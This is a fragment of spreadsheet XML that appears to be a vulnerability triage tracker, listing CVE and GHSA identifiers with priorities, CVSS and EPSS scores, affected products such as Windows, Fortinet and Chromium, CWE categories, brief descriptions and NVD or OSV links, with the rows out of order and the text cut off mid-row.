        </is>
      </c>
      <c r="D1078" s="5" t="inlineStr"/>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1078" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1078" s="5" t="inlineStr"/>
      <c r="R1078" s="5" t="inlineStr"/>
      <c r="S1078"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1078" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
      <c r="D1079" s="5" t="inlineStr"/>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr"/>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1079" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1079" s="5" t="inlineStr"/>
      <c r="R1079" s="5" t="inlineStr"/>
      <c r="S1079" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1079" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
      <c r="D1080" s="5" t="inlineStr"/>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr"/>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>npm:sharp</t>
        </is>
      </c>
      <c r="M1080" s="5" t="inlineStr">
        <is>
          <t>0.35.4</t>
        </is>
      </c>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1080" s="5" t="inlineStr"/>
      <c r="R1080" s="5" t="inlineStr"/>
      <c r="S1080" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1080" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H1081" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1081" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr"/>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="S1081" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="T1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H1082" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1082" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr"/>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R1082" s="5" t="inlineStr"/>
      <c r="S1082"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1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T1082"/>
  <conditionalFormatting sqref="E2:E108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8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CVE-2026-81963</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S4"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T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S5"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T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="S6"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T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.01</v>
      </c>
